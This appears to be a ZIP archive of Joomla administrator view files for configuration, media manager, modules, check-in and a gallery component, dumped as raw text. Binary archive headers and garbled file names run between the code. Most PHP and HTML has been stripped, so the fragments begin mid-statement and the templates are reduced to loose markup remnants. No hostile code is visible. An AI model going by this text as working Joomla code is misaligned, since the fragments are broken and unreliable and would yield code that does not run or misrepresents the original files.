    PKieB\Vplugin/tmpl/index.htmlnuW+A PK fB\component/view.html.phpnuW+Aget('Form'); $component = $this->get('Component'); // Check for errors. if (count($errors = $this->get('Errors'))) { JError::raiseError(500, implode("\n", $errors)); return false; } // Bind the form to the data. if ($form && $component->params) { $form->bind($component->params); } $this->assignRef('form', $form); $this->assignRef('component', $component); $this->document->setTitle(JText::_('JGLOBAL_EDIT_PREFERENCES')); parent::display($tpl); JRequest::setVar('hidemainmenu', true); } } PK fB\)component/tmpl/.htaccessnuW+A Order allow,deny Deny from all PK fB\Vcomponent/tmpl/index.htmlnuW+A PK fB\+Dz z component/tmpl/default.phpnuW+AgetTemplate(); // Load the tooltip behavior. JHtml::_('behavior.tooltip'); JHtml::_('behavior.formvalidation'); ?>
    component->option.'_configuration') ?>
    component->option.'_configuration', array('useCookie'=>1)); $fieldSets = $this->form->getFieldsets(); foreach ($fieldSets as $name => $fieldSet) : $label = empty($fieldSet->label) ? 'COM_CONFIG_'.$name.'_FIELDSET_LABEL' : $fieldSet->label; echo JHtml::_('tabs.panel', JText::_($label), 'publishing-details'); if (isset($fieldSet->description) && !empty($fieldSet->description)) : echo '

    '.JText::_($fieldSet->description).'

    '; endif; ?>
    PK fB\)component/.htaccessnuW+A Order allow,deny Deny from all PK fB\Vcomponent/index.htmlnuW+A PK fB\~Gapplication/view.html.phpnuW+Aget('Form'); $data = $this->get('Data'); // Check for model errors. if ($errors = $this->get('Errors')) { JError::raiseError(500, implode('
    ', $errors)); return false; } // Bind the form to the data. if ($form && $data) { $form->bind($data); } // Get the params for com_users. $usersParams = JComponentHelper::getParams('com_users'); // Get the params for com_media. $mediaParams = JComponentHelper::getParams('com_media'); // Load settings for the FTP layer. $ftp = JClientHelper::setCredentialsFromRequest('ftp'); $this->assignRef('form', $form); $this->assignRef('data', $data); $this->assignRef('ftp', $ftp); $this->assignRef('usersParams', $usersParams); $this->assignRef('mediaParams', $mediaParams); $this->addToolbar(); parent::display($tpl); } /** * Add the page title and toolbar. * * @since 1.6 */ protected function addToolbar() { JToolBarHelper::title(JText::_('COM_CONFIG_GLOBAL_CONFIGURATION'), 'config.png'); JToolBarHelper::apply('application.apply'); JToolBarHelper::save('application.save'); JToolBarHelper::divider(); JToolBarHelper::cancel('application.cancel'); JToolBarHelper::divider(); JToolBarHelper::help('JHELP_SITE_GLOBAL_CONFIGURATION'); } } PK fB\Vapplication/index.htmlnuW+A PK fB\w)̅!application/tmpl/default_mail.phpnuW+A
      form->getFieldset('mail') as $field): ?>
    • label; ?> input; ?>
    PK fB\A%%%application/tmpl/default_ftplogin.phpnuW+A
    ftp instanceof Exception): ?>

    ftp->message); ?>

    PK fB\$Ɖ#application/tmpl/default_server.phpnuW+A
      form->getFieldset('server') as $field): ?>
    • label; ?> input; ?>
    PK fB\g #application/tmpl/default_cookie.phpnuW+A
      form->getFieldset('cookie') as $field): ?>
    • label; ?> input; ?>
    PK fB\#application/tmpl/default_system.phpnuW+A
      form->getFieldset('system') as $field): ?>
    • label; ?> input; ?>
    PK fB\J= #application/tmpl/default_locale.phpnuW+A
      form->getFieldset('locale') as $field): ?>
    • label; ?> input; ?>
    PK fB\qq(application/tmpl/default_permissions.phpnuW+A
    form->getFieldset('permissions') as $field): ?> label; ?>
    input; ?>
    PK fB\*xj j application/tmpl/default.phpnuW+Adocument->setBuffer($this->loadTemplate('navigation'), 'modules', 'submenu'); ?>
    ftp) : ?> loadTemplate('ftplogin'); ?>
    loadTemplate('site'); ?> loadTemplate('metadata'); ?>
    loadTemplate('seo'); ?> loadTemplate('cookie'); ?>
    loadTemplate('system'); ?>
    loadTemplate('debug'); ?> loadTemplate('cache'); ?> loadTemplate('session'); ?>
    loadTemplate('server'); ?> loadTemplate('locale'); ?> loadTemplate('ftp'); ?>
    loadTemplate('database'); ?> loadTemplate('mail'); ?>
    loadTemplate('permissions'); ?>
    loadTemplate('filters'); ?>
    PK fB\򵢮$application/tmpl/default_filters.phpnuW+A

    form->getFieldset('filters') as $field): ?> label; ?>
    input; ?>
    PK fB\m:Ff$application/tmpl/default_session.phpnuW+A
      form->getFieldset('session') as $field): ?>
    • label; ?> input; ?>
    PK fB\d2 application/tmpl/default_seo.phpnuW+A
      form->getFieldset('seo') as $field): ?>
    • label; ?> input; ?>
    PK fB\Vapplication/tmpl/index.htmlnuW+A PK fB\Nl application/tmpl/default_ftp.phpnuW+A
      form->getFieldset('ftp') as $field): ?>
    • label; ?> input; ?>
    PK fB\]9ދ%application/tmpl/default_database.phpnuW+A
      form->getFieldset('database') as $field): ?>
    • label; ?> input; ?>
    PK fB\Ϫ5"application/tmpl/default_cache.phpnuW+A
      form->getFieldset('cache') as $field): ?>
    • label; ?> input; ?>
    • data['cache_handler']) && $this->data['cache_handler'] == 'memcache' || $this->data['session_handler'] == 'memcache') : ?> form->getFieldset('memcache') as $mfield): ?>
    • label; ?> input; ?>
    PK fB\_!application/tmpl/default_site.phpnuW+A
      form->getFieldset('site') as $field): ?>
    • label; ?> input; ?>
    PK fB\ʏ˿##'application/tmpl/default_navigation.phpnuW+A PK fB\Ro*%application/tmpl/default_metadata.phpnuW+A
      form->getFieldset('metadata') as $field): ?>
    • label; ?> input; ?>
    PK fB\ÁxՇ"application/tmpl/default_debug.phpnuW+A
      form->getFieldset('debug') as $field): ?>
    • label; ?> input; ?>
    PK fB\)application/tmpl/.htaccessnuW+A Order allow,deny Deny from all PK fB\)application/.htaccessnuW+A Order allow,deny Deny from all PK fB\1  close/view.html.phpnuW+AaddScriptDeclaration(' window.parent.location.href=window.parent.location.href; window.parent.SqueezeBox.close(); '); } } PK fB\)close/.htaccessnuW+A Order allow,deny Deny from all PK fB\Vclose/index.htmlnuW+A PK!nB\)media/.htaccessnuW+A Order allow,deny Deny from all PK!nB\Vmedia/tmpl/index.htmlnuW+A PK!nB\|(media/tmpl/default_folders.phpnuW+A PK!nB\)media/tmpl/.htaccessnuW+A Order allow,deny Deny from all PK!nB\%!media/tmpl/default_navigation.phpnuW+AgetUserStateFromRequest('media.list.layout', 'layout', 'thumbs', 'word'); ?> PK!nB\SCCmedia/tmpl/default.phpnuW+A
    loadTemplate('folders'); ?>
    authorise('core.create', 'com_media')) and $this->require_ftp): ?>
    authorise('core.create', 'com_media')): ?>
    authorise('core.create', 'com_media')):?>
    config->get('upload_maxsize')=='0' ? JText::_('COM_MEDIA_UPLOAD_FILES_NOLIMIT') : JText::sprintf('COM_MEDIA_UPLOAD_FILES', $this->config->get('upload_maxsize')); ?>
    PK!nB\q media/view.html.phpnuW+AgetUserStateFromRequest('media.list.layout', 'layout', 'thumbs', 'word'); $document = JFactory::getDocument(); $document->setBuffer($this->loadTemplate('navigation'), 'modules', 'submenu'); JHtml::_('behavior.framework', true); JHtml::_('script', 'media/mediamanager.js', true, true); JHtml::_('stylesheet', 'media/mediamanager.css', array(), true); if ($lang->isRTL()) : JHtml::_('stylesheet', 'media/mediamanager_rtl.css', array(), true); endif; JHtml::_('behavior.modal'); $document->addScriptDeclaration(" window.addEvent('domready', function() { document.preview = SqueezeBox; });"); JHtml::_('script', 'system/mootree.js', true, true, false, false); JHtml::_('stylesheet', 'system/mootree.css', array(), true); if ($lang->isRTL()) : JHtml::_('stylesheet', 'media/mootree_rtl.css', array(), true); endif; if (DIRECTORY_SEPARATOR == '\\') { $base = str_replace(DIRECTORY_SEPARATOR, "\\\\", COM_MEDIA_BASE); } else { $base = COM_MEDIA_BASE; } $js = " var basepath = '".$base."'; var viewstyle = '".$style."'; " ; $document->addScriptDeclaration($js); /* * Display form for FTP credentials? * Don't set them here, as there are other functions called before this one if there is any file write operation */ $ftp = !JClientHelper::hasCredentials('ftp'); $session = JFactory::getSession(); $state = $this->get('state'); $this->assignRef('session', $session); $this->assignRef('config', $config); $this->assignRef('state', $state); $this->require_ftp = $ftp; $this->folders_id = ' id="media-tree"'; $this->folders = $this->get('folderTree'); // Set the toolbar $this->addToolbar(); parent::display($tpl); echo JHtml::_('behavior.keepalive'); } /** * Add the page title and toolbar. * * @since 1.6 */ protected function addToolbar() { // Get the toolbar object instance $bar = JToolBar::getInstance('toolbar'); $user = JFactory::getUser(); // Set the titlebar text JToolBarHelper::title(JText::_('COM_MEDIA'), 'mediamanager.png'); // Add a delete button if ($user->authorise('core.delete', 'com_media')) { $title = JText::_('JTOOLBAR_DELETE'); $dhtml = " $title"; $bar->appendButton('Custom', $dhtml, 'delete'); JToolBarHelper::divider(); } // Add a delete button if ($user->authorise('core.admin', 'com_media')) { JToolBarHelper::preferences('com_media', 450, 800, 'JToolbar_Options', '', 'window.location.reload()'); JToolBarHelper::divider(); } JToolBarHelper::help('JHELP_CONTENT_MEDIA_MANAGER'); } function getFolderLevel($folder) { $this->folders_id = null; $txt = null; if (isset($folder['children']) && count($folder['children'])) { $tmp = $this->folders; $this->folders = $folder; $txt = $this->loadTemplate('folders'); $this->folders = $tmp; } return $txt; } } PK!nB\Vmedia/index.htmlnuW+A PK!nB\Vimages/tmpl/index.htmlnuW+A PK!nB\@images/tmpl/default.phpnuW+A
    folderList; ?>
    state->get('field.id')):?> state->get('field.id')):?>
    authorise('core.create', 'com_media')): ?>
    config->get('upload_maxsize')=='0' ? JText::_('COM_MEDIA_UPLOAD_FILES_NOLIMIT') : JText::sprintf('COM_MEDIA_UPLOAD_FILES', $this->config->get('upload_maxsize')); ?>
    PK!nB\)images/tmpl/.htaccessnuW+A Order allow,deny Deny from all PK!nB\zhimages/view.html.phpnuW+AisRTL()) { JHtml::_('stylesheet', 'media/popup-imagemanager_rtl.css', array(), true); } /* * Display form for FTP credentials? * Don't set them here, as there are other functions called before this one if there is any file write operation */ $ftp = !JClientHelper::hasCredentials('ftp'); $this->session = JFactory::getSession(); $this->config = $config; $this->state = $this->get('state'); $this->folderList = $this->get('folderList'); $this->require_ftp = $ftp; parent::display($tpl); } } PK!nB\)images/.htaccessnuW+A Order allow,deny Deny from all PK!nB\Vimages/index.htmlnuW+A PK!nB\)medialist/.htaccessnuW+A Order allow,deny Deny from all PK!nB\隀B medialist/view.html.phpnuW+AgetUserStateFromRequest('media.list.layout', 'layout', 'thumbs', 'word'); $lang = JFactory::getLanguage(); JHtml::_('behavior.framework', true); $document = JFactory::getDocument(); $document->addStyleSheet('../media/media/css/medialist-'.$style.'.css'); if ($lang->isRTL()) : $document->addStyleSheet('../media/media/css/medialist-'.$style.'_rtl.css'); endif; $document->addScriptDeclaration(" window.addEvent('domready', function() { window.parent.document.updateUploader(); $$('a.img-preview').each(function(el) { el.addEvent('click', function(e) { new Event(e).stop(); window.top.document.preview.fromElement(el); }); }); });"); $images = $this->get('images'); $documents = $this->get('documents'); $folders = $this->get('folders'); $state = $this->get('state'); // Check for invalid folder name if (empty($state->folder)) { $dirname = JRequest::getVar('folder', '', '', 'string'); if (!empty($dirname)) { $dirname = htmlspecialchars($dirname, ENT_COMPAT, 'UTF-8'); if ($lang->hasKey('COM_MEDIA_ERROR_UNABLE_TO_BROWSE_FOLDER_WARNDIRNAME')) { JError::raiseWarning(100, JText::sprintf('COM_MEDIA_ERROR_UNABLE_TO_BROWSE_FOLDER_WARNDIRNAME', $dirname)); } else { JError::raiseWarning(100, sprintf('Unable to browse: %s. Directory name must only contain alphanumeric characters and no spaces.', $dirname)); } } } $this->baseURL = JURI::root(); $this->assignRef('images', $images); $this->assignRef('documents', $documents); $this->assignRef('folders', $folders); $this->assignRef('state', $state); parent::display($tpl); } function setFolder($index = 0) { if (isset($this->folders[$index])) { $this->_tmp_folder = &$this->folders[$index]; } else { $this->_tmp_folder = new JObject; } } function setImage($index = 0) { if (isset($this->images[$index])) { $this->_tmp_img = &$this->images[$index]; } else { $this->_tmp_img = new JObject; } } function setDoc($index = 0) { if (isset($this->documents[$index])) { $this->_tmp_doc = &$this->documents[$index]; } else { $this->_tmp_doc = new JObject; } } } PK!nB\Vmedialist/index.htmlnuW+A PK!nB\} medialist/tmpl/thumbs_folder.phpnuW+A
    authorise('core.delete', 'com_media')):?> 16, 'height' => 16, 'border' => 0), true); ?>
    PK"nB\p88medialist/tmpl/thumbs_doc.phpnuW+Atrigger('onContentBeforeDisplay', array('com_media.file', &$this->_tmp_doc, &$params)); ?>
    authorise('core.delete', 'com_media')):?> 16, 'height' => 16), true); ?>
    _tmp_doc->title; ?>
    trigger('onContentAfterDisplay', array('com_media.file', &$this->_tmp_doc, &$params)); ?> PK"nB\ ``medialist/tmpl/thumbs_img.phpnuW+Atrigger('onContentBeforeDisplay', array('com_media.file', &$this->_tmp_img, &$params)); ?>
    authorise('core.delete', 'com_media')):?> 16, 'height' => 16), true); ?>
    trigger('onContentAfterDisplay', array('com_media.file', &$this->_tmp_img, &$params)); ?> PK"nB\1XXmedialist/tmpl/details_doc.phpnuW+Atrigger('onContentBeforeDisplay', array('com_media.file', &$this->_tmp_doc, &$params)); ?> _tmp_doc->icon_16, $this->_tmp_doc->title, null, true, true) ? JHtml::_('image', $this->_tmp_doc->icon_16, $this->_tmp_doc->title, array('width' => 16, 'height' => 16), true) : JHtml::_('image', 'media/con_info.png', $this->_tmp_doc->title, array('width' => 16, 'height' => 16), true);?> _tmp_doc->title; ?>   _tmp_doc->size); ?> authorise('core.delete', 'com_media')):?> 16, 'height' => 16, 'border' => 0), true);?> trigger('onContentAfterDisplay', array('com_media.file', &$this->_tmp_doc, &$params)); ?> PK"nB\uTjQQmedialist/tmpl/details_img.phpnuW+Atrigger('onContentBeforeDisplay', array('com_media.file', &$this->_tmp_img, &$params)); ?> _tmp_img->path_relative, JText::sprintf('COM_MEDIA_IMAGE_TITLE', $this->_tmp_img->title, MediaHelper::parseSize($this->_tmp_img->size)), array('width' => $this->_tmp_img->width_16, 'height' => $this->_tmp_img->height_16)); ?> escape($this->_tmp_img->title); ?> _tmp_img->width, $this->_tmp_img->height); ?> _tmp_img->size); ?> authorise('core.delete', 'com_media')):?> 16, 'height' => 16), true); ?> trigger('onContentAfterDisplay', array('com_media.file', &$this->_tmp_img, &$params)); ?> PK"nB\\medialist/tmpl/details_up.phpnuW+A 16, 'height' => 16), true); ?> ..     authorise('core.delete', 'com_media')):?>   PK"nB\Vmedialist/tmpl/index.htmlnuW+A PK"nB\Rff!medialist/tmpl/details_folder.phpnuW+A _tmp_folder->name, array('width' => 16, 'height' => 16), true); ?> _tmp_folder->name; ?>     authorise('core.delete', 'com_media')):?> 16, 'height' => 16), true); ?> PK"nB\)medialist/tmpl/.htaccessnuW+A Order allow,deny Deny from all PK"nB\R/medialist/tmpl/thumbs_up.phpnuW+A
     
    ..
    PK"nB\Q,medialist/tmpl/details.phpnuW+A
    authorise('core.delete', 'com_media')):?> loadTemplate('up'); ?> folders); $i<$n; $i++) : $this->setFolder($i); echo $this->loadTemplate('folder'); endfor; ?> documents); $i<$n; $i++) : $this->setDoc($i); echo $this->loadTemplate('doc'); endfor; ?> images); $i<$n; $i++) : $this->setImage($i); echo $this->loadTemplate('img'); endfor; ?>
    PK"nB\ɳ||medialist/tmpl/thumbs.phpnuW+A
    loadTemplate('up'); ?> folders); $i<$n; $i++) : $this->setFolder($i); echo $this->loadTemplate('folder'); endfor; ?> documents); $i<$n; $i++) : $this->setDoc($i); echo $this->loadTemplate('doc'); endfor; ?> images); $i<$n; $i++) : $this->setImage($i); echo $this->loadTemplate('img'); endfor; ?>
    PK"nB\FHmedialist/tmpl/default.phpnuW+AisRTL()) : JHtml::_('stylesheet', 'media/popup-imagelist_rtl.css', array(), true); endif; $document = JFactory::getDocument(); $document->addScriptDeclaration("var ImageManager = window.parent.ImageManager;"); $images = $this->get('images'); $folders = $this->get('folders'); $state = $this->get('state'); $this->baseURL = COM_MEDIA_BASEURL; $this->assignRef('images', $images); $this->assignRef('folders', $folders); $this->assignRef('state', $state); parent::display($tpl); } function setFolder($index = 0) { if (isset($this->folders[$index])) { $this->_tmp_folder = &$this->folders[$index]; } else { $this->_tmp_folder = new JObject; } } function setImage($index = 0) { if (isset($this->images[$index])) { $this->_tmp_img = &$this->images[$index]; } else { $this->_tmp_img = new JObject; } } } PK"nB\)imageslist/.htaccessnuW+A Order allow,deny Deny from all PK"nB\Vimageslist/index.htmlnuW+A PK"nB\Ekk!imageslist/tmpl/default_image.phpnuW+Atrigger('onContentBeforeDisplay', array('com_media.file', &$this->_tmp_img, &$params)); ?>
    baseURL.'/'.$this->_tmp_img->path_relative, JText::sprintf('COM_MEDIA_IMAGE_TITLE', $this->_tmp_img->title, MediaHelper::parseSize($this->_tmp_img->size)), array('width' => $this->_tmp_img->width_60, 'height' => $this->_tmp_img->height_60)); ?> _tmp_img->title; ?>
    trigger('onContentAfterDisplay', array('com_media.file', &$this->_tmp_img, &$params)); ?> PK"nB\)imageslist/tmpl/.htaccessnuW+A Order allow,deny Deny from all PK"nB\Vimageslist/tmpl/index.htmlnuW+A PK"nB\&imageslist/tmpl/default.phpnuW+A images) > 0 || count($this->folders) > 0) { ?>
    folders); $i<$n; $i++) : $this->setFolder($i); echo $this->loadTemplate('folder'); endfor; ?> images); $i<$n; $i++) : $this->setImage($i); echo $this->loadTemplate('image'); endfor; ?>

    PK"nB\1"imageslist/tmpl/default_folder.phpnuW+A
    _tmp_folder->name, array('height' => 80, 'width' => 80), true); ?> _tmp_folder->name; ?>
    PKppB\)select/.htaccessnuW+A Order allow,deny Deny from all PKppB\Vselect/index.htmlnuW+A PKppB\)select/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKppB\Vselect/tmpl/index.htmlnuW+A PKppB\sselect/tmpl/default.phpnuW+A
    PKppB\(''select/view.html.phpnuW+Aget('State'); $items = $this->get('Items'); // Check for errors. if (count($errors = $this->get('Errors'))) { JError::raiseError(500, implode("\n", $errors)); return false; } $this->assignRef('state', $state); $this->assignRef('items', $items); parent::display($tpl); } } PKppB\)positions/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKppB\Vpositions/tmpl/index.htmlnuW+A PKppB\XeB''positions/tmpl/modal.phpnuW+Aescape($this->state->get('list.ordering')); $direction = $this->escape($this->state->get('list.direction')); $clientId = $this->state->get('filter.client_id'); $state = $this->state->get('filter.state'); $template = $this->state->get('filter.template'); $type = $this->state->get('filter.type'); ?>
    items as $value=>$templates) : ?>
    pagination->getListFooter(); ?>
    escape($value); ?>
      $label):?>
    • hasKey($label) ? JText::sprintf('COM_MODULES_MODULE_TEMPLATE_POSITION', JText::_($template), JText::_($label)) : JText::_($template);?>
    PKppB\B<positions/view.html.phpnuW+Aitems = $this->get('Items'); $this->pagination = $this->get('Pagination'); $this->state = $this->get('State'); // Check for errors. if (count($errors = $this->get('Errors'))) { JError::raiseError(500, implode("\n", $errors)); return false; } parent::display($tpl); } } PKppB\)positions/.htaccessnuW+A Order allow,deny Deny from all PKppB\Vpositions/index.htmlnuW+A PKppB\)module/.htaccessnuW+A Order allow,deny Deny from all PKppB\07iimodule/tmpl/edit_assignment.phpnuW+A
    PKppB\NNmodule/tmpl/edit.phpnuW+Aitem->module) || $this->item->module == 'custom' || $this->item->module == 'mod_custom'; $script = "Joomla.submitbutton = function(task) { if (task == 'module.cancel' || document.formvalidator.isValid(document.id('module-form'))) {"; if ($hasContent) { $script .= $this->form->getField('content')->save(); } $script .= " Joomla.submitform(task, document.getElementById('module-form')); if (self != top) { window.top.setTimeout('window.parent.SqueezeBox.close()', 1000); } } else { alert('".$this->escape(JText::_('JGLOBAL_VALIDATION_FORM_FAILED'))."'); } }"; JFactory::getDocument()->addScriptDeclaration($script); ?>
    • form->getLabel('title'); ?> form->getInput('title'); ?>
    • form->getLabel('showtitle'); ?> form->getInput('showtitle'); ?>
    • form->getLabel('position'); ?> form->getInput('position'); ?>
    • item->xml->name != 'Login Form'): ?>
    • form->getLabel('published'); ?> form->getInput('published'); ?>
    • form->getLabel('access'); ?> form->getInput('access'); ?>
    • form->getLabel('ordering'); ?> form->getInput('ordering'); ?>
    • item->xml->name != 'Login Form'): ?>
    • form->getLabel('publish_up'); ?> form->getInput('publish_up'); ?>
    • form->getLabel('publish_down'); ?> form->getInput('publish_down'); ?>
    • form->getLabel('language'); ?> form->getInput('language'); ?>
    • form->getLabel('note'); ?> form->getInput('note'); ?>
    • item->id) : ?>
    • form->getLabel('id'); ?> form->getInput('id'); ?>
    • form->getLabel('module'); ?> form->getInput('module'); ?>
    • form->getLabel('client_id'); ?> form->getInput('client_id'); ?>
    item->xml) : ?> item->xml->description)) : ?>

    loadTemplate('options'); ?>
    • form->getLabel('content'); ?>
      form->getInput('content'); ?>
    item->client_id == 0) :?>
    loadTemplate('assignment'); ?>
    PKppB\H>cssmodule/tmpl/modal.phpnuW+A
    setLayout('edit'); echo $this->loadTemplate(); PKppB\)module/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKppB\笗module/tmpl/edit_options.phpnuW+Aform->getFieldsets('params'); foreach ($fieldSets as $name => $fieldSet) : $label = !empty($fieldSet->label) ? $fieldSet->label : 'COM_MODULES_'.$name.'_FIELDSET_LABEL'; echo JHtml::_('sliders.panel', JText::_($label), $name.'-options'); if (isset($fieldSet->description) && trim($fieldSet->description)) : echo '

    '.$this->escape(JText::_($fieldSet->description)).'

    '; endif; ?>
    PKppB\Vmodule/tmpl/index.htmlnuW+A PKppB\Vmodule/index.htmlnuW+A PKppB\HO O module/view.html.phpnuW+Aform = $this->get('Form'); $this->item = $this->get('Item'); $this->state = $this->get('State'); // Check for errors. if (count($errors = $this->get('Errors'))) { JError::raiseError(500, implode("\n", $errors)); return false; } $this->addToolbar(); parent::display($tpl); } /** * Add the page title and toolbar. * * @since 1.6 */ protected function addToolbar() { JRequest::setVar('hidemainmenu', true); $user = JFactory::getUser(); $isNew = ($this->item->id == 0); $checkedOut = !($this->item->checked_out == 0 || $this->item->checked_out == $user->get('id')); $canDo = ModulesHelper::getActions($this->state->get('filter.category_id'), $this->item->id); $item = $this->get('Item'); JToolBarHelper::title( JText::sprintf('COM_MODULES_MANAGER_MODULE', JText::_($this->item->module)), 'module.png'); // If not checked out, can save the item. if (!$checkedOut && ($canDo->get('core.edit') || $canDo->get('core.create') )) { JToolBarHelper::apply('module.apply'); JToolBarHelper::save('module.save'); } if (!$checkedOut && $canDo->get('core.create')) { JToolBarHelper::save2new('module.save2new'); } // If an existing item, can save to a copy. if (!$isNew && $canDo->get('core.create')) { JToolBarHelper::save2copy('module.save2copy'); } if (empty($this->item->id)) { JToolBarHelper::cancel('module.cancel'); } else { JToolBarHelper::cancel('module.cancel', 'JTOOLBAR_CLOSE'); } // Get the help information for the menu item. $lang = JFactory::getLanguage(); $help = $this->get('Help'); if ($lang->hasKey($help->url)) { $debug = $lang->setDebug(false); $url = JText::_($help->url); $lang->setDebug($debug); } else { $url = null; } JToolBarHelper::help($help->key, false, $url); } } PKppB\ UUmodules/tmpl/default_batch.phpnuW+Astate->get('filter.client_id'); $published = $this->state->get('filter.published'); ?>

    = 0) : ?>
    PKppB\Vmodules/tmpl/index.htmlnuW+A PKppB\;t$t$modules/tmpl/default.phpnuW+Astate->get('filter.client_id') ? 'administrator' : 'site'; $user = JFactory::getUser(); $listOrder = $this->escape($this->state->get('list.ordering')); $listDirn = $this->escape($this->state->get('list.direction')); $canOrder = $user->authorise('core.edit.state', 'com_modules'); $saveOrder = $listOrder == 'ordering'; ?>
    items as $i => $item) : $ordering = ($listOrder == 'ordering'); $canCreate = $user->authorise('core.create', 'com_modules'); $canEdit = $user->authorise('core.edit', 'com_modules'); $canCheckin = $user->authorise('core.manage', 'com_checkin') || $item->checked_out==$user->get('id')|| $item->checked_out==0; $canChange = $user->authorise('core.edit.state', 'com_modules') && $canCheckin; ?>
    items, 'filesave.png', 'modules.saveorder'); ?>
    pagination->getListFooter(); ?>
    id); ?> checked_out) : ?> editor, $item->checked_out_time, 'modules.', $canCheckin); ?> escape($item->title); ?> escape($item->title); ?> note)) : ?>

    escape($item->note));?>

    published, $i, $canChange, 'cb'); ?> position) : ?> position; ?> pagination->orderUpIcon($i, (@$this->items[$i-1]->position == $item->position), 'modules.orderup', 'JLIB_HTML_MOVE_UP', $ordering); ?> pagination->orderDownIcon($i, $this->pagination->total, (@$this->items[$i+1]->position == $item->position), 'modules.orderdown', 'JLIB_HTML_MOVE_DOWN', $ordering); ?> pagination->orderUpIcon($i, (@$this->items[$i-1]->position == $item->position), 'modules.orderdown', 'JLIB_HTML_MOVE_UP', $ordering); ?> pagination->orderDownIcon($i, $this->pagination->total, (@$this->items[$i+1]->position == $item->position), 'modules.orderup', 'JLIB_HTML_MOVE_DOWN', $ordering); ?> class="text-area-order" /> ordering; ?> name;?> pages; ?> escape($item->access_level); ?> language==''):?> language=='*'):?> language_title ? $this->escape($item->language_title) : JText::_('JUNDEFINED'); ?> id; ?>
    authorize('core.create', 'com_modules') && $user->authorize('core.edit', 'com_modules') && $user->authorize('core.edit.state', 'com_modules')) : ?> loadTemplate('batch'); ?>
    PKppB\)modules/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKppB\r<@c c modules/view.html.phpnuW+Aitems = $this->get('Items'); $this->pagination = $this->get('Pagination'); $this->state = $this->get('State'); // Check for errors. if (count($errors = $this->get('Errors'))) { JError::raiseError(500, implode("\n", $errors)); return false; } // Check if there are no matching items if(!count($this->items)){ JFactory::getApplication()->enqueueMessage( JText::_('COM_MODULES_MSG_MANAGE_NO_MODULES') , 'warning' ); } $this->addToolbar(); // Include the component HTML helpers. JHtml::addIncludePath(JPATH_COMPONENT . '/helpers/html'); parent::display($tpl); } /** * Add the page title and toolbar. * * @since 1.6 */ protected function addToolbar() { $state = $this->get('State'); $canDo = ModulesHelper::getActions(); JToolBarHelper::title(JText::_('COM_MODULES_MANAGER_MODULES'), 'module.png'); if ($canDo->get('core.create')) { //JToolBarHelper::addNew('module.add'); $bar = JToolBar::getInstance('toolbar'); $bar->appendButton('Popup', 'new', 'JTOOLBAR_NEW', 'index.php?option=com_modules&view=select&tmpl=component', 850, 400); } if ($canDo->get('core.edit')) { JToolBarHelper::editList('module.edit'); } if ($canDo->get('core.create')) { JToolBarHelper::custom('modules.duplicate', 'copy.png', 'copy_f2.png', 'JTOOLBAR_DUPLICATE', true); } if ($canDo->get('core.edit.state')) { JToolBarHelper::divider(); JToolBarHelper::publish('modules.publish', 'JTOOLBAR_PUBLISH', true); JToolBarHelper::unpublish('modules.unpublish', 'JTOOLBAR_UNPUBLISH', true); JToolBarHelper::divider(); JToolBarHelper::checkin('modules.checkin'); } if ($state->get('filter.state') == -2 && $canDo->get('core.delete')) { JToolBarHelper::deleteList('', 'modules.delete', 'JTOOLBAR_EMPTY_TRASH'); JToolBarHelper::divider(); } elseif ($canDo->get('core.edit.state')) { JToolBarHelper::trash('modules.trash'); JToolBarHelper::divider(); } if ($canDo->get('core.admin')) { JToolBarHelper::preferences('com_modules'); JToolBarHelper::divider(); } JToolBarHelper::help('JHELP_EXTENSIONS_MODULE_MANAGER'); } } PKppB\)modules/.htaccessnuW+A Order allow,deny Deny from all PKppB\Vmodules/index.htmlnuW+A PKppB\)preview/.htaccessnuW+A Order allow,deny Deny from all PKppB\Vpreview/index.htmlnuW+A PKppB\Ou*TTpreview/view.html.phpnuW+AassignRef('editor', $editor); parent::display($tpl); } } PKppB\vpreview/tmpl/default.phpnuW+A
    PKppB\Vpreview/tmpl/index.htmlnuW+A PKppB\)preview/tmpl/.htaccessnuW+A Order allow,deny Deny from all PK{B\Vcheckin/index.htmlnuW+A PK{B\+XXcheckin/view.html.phpnuW+Aitems = $this->get('Items'); $this->pagination = $this->get('Pagination'); $this->state = $this->get('State'); // Check for errors. if (count($errors = $this->get('Errors'))) { JError::raiseError(500, implode("\n", $errors)); return false; } $this->addToolbar(); parent::display($tpl); } /** * Add the page title and toolbar. * * @since 1.6 */ protected function addToolbar() { JToolBarHelper::title(JText::_('COM_CHECKIN_GLOBAL_CHECK_IN'), 'checkin.png'); JToolBarHelper::custom('checkin', 'checkin.png', 'checkin_f2.png', 'JTOOLBAR_CHECKIN', true); JToolBarHelper::divider(); if (JFactory::getUser()->authorise('core.admin', 'com_checkin')) { JToolBarHelper::preferences('com_checkin'); JToolBarHelper::divider(); } JToolBarHelper::help('JHELP_SITE_MAINTENANCE_GLOBAL_CHECK-IN'); } } PK{B\)checkin/.htaccessnuW+A Order allow,deny Deny from all PK{B\)checkin/tmpl/.htaccessnuW+A Order allow,deny Deny from all PK{B\Vcheckin/tmpl/index.htmlnuW+A PK{B\>L checkin/tmpl/default.phpnuW+Aescape($this->state->get('list.ordering')); $listDirn = $this->escape($this->state->get('list.direction')); ?>
    items as $table => $count): $i=0;?>
    pagination->getListFooter(); ?>
    PKB\ܓ?admirorgallery/view.html.phpnuW+Astate = $this->get('State'); $this->item = $this->get('Item'); $this->form = $this->get('Form'); JToolBarHelper::title( JText::_( 'COM_ADMIRORGALLERY_CONTROL_PANEL'), 'controlpanel' ); $this->form = $this->get('Form'); parent::display($tpl); } } PKB\)admirorgallery/.htaccessnuW+A Order allow,deny Deny from all PKB\#o,,admirorgallery/tmpl/index.htmlnuW+APKB\³aaadmirorgallery/tmpl/default.phpnuW+A
    isRTL()) ? $iconFloat = "right" : $iconFloat = "left"; echo '
    '; } echo '
    '; quickiconButton('index.php?option=com_admirorgallery&view=resourcemanager&AG_resourceType=templates', 'icon-48-templates.png', JText::_('COM_ADMIRORGALLERY_TEMPLATES'), $AG_templateID); quickiconButton('index.php?option=com_admirorgallery&view=resourcemanager&AG_resourceType=popups', 'icon-48-popups.png', JText::_('COM_ADMIRORGALLERY_POPUPS'), $AG_templateID); quickiconButton('index.php?option=com_admirorgallery&view=imagemanager', 'icon-48-imagemanager.png', JText::_('COM_ADMIRORGALLERY_IMAGE_MANAGER'), $AG_templateID); echo '

